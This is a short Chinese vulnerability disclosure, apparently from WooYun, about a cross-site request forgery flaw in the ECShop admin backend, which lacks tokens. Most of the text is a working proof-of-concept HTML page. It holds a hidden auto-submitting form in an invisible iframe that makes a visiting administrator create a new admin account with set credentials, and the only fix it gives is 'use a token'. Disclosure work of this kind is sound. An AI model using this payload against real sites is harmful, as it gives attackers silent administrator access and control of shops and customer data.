后台没有token有木有!!!
所以,做好一个自动提交表单,且载入与一个隐藏的框架中,给管理员访问,管理员就中招了有木有!!!
POC:
代表乌云消灭你 Ecshop Csrf获取管理员权限测试 By VIP
<form method="POST" action="http://127.0.0.1/ecshop/admin/privilege.php?act=add" target="hidden_frame"> <input type="hidden" name="user_name" value="wooyun" /> <input type="hidden" name="email" value="root@wooyun.org" /> <input type="hidden" name="password" value="wooyuntest123" /> <input type="hidden" name="pwd_confirm" value="wooyuntest123" /> <input type="hidden" name="act" value="insert" /> </form> <iframe style="DISPLAY: none" id=hidden_frame name=hidden_frame></iframe> <script>document.forms[0].submit();</script>
给管理员访问这个页面后,页面没有变化,但是后台其实已经增加了一个用户名wooyun 邮箱root@wooyun.org 密码wooyuntest123的管理员 有木有!!!
修复方案: token呀
查看更多关于Ecshop一处Csrf可通过交互管理员获取后台权限 - 网的详细内容...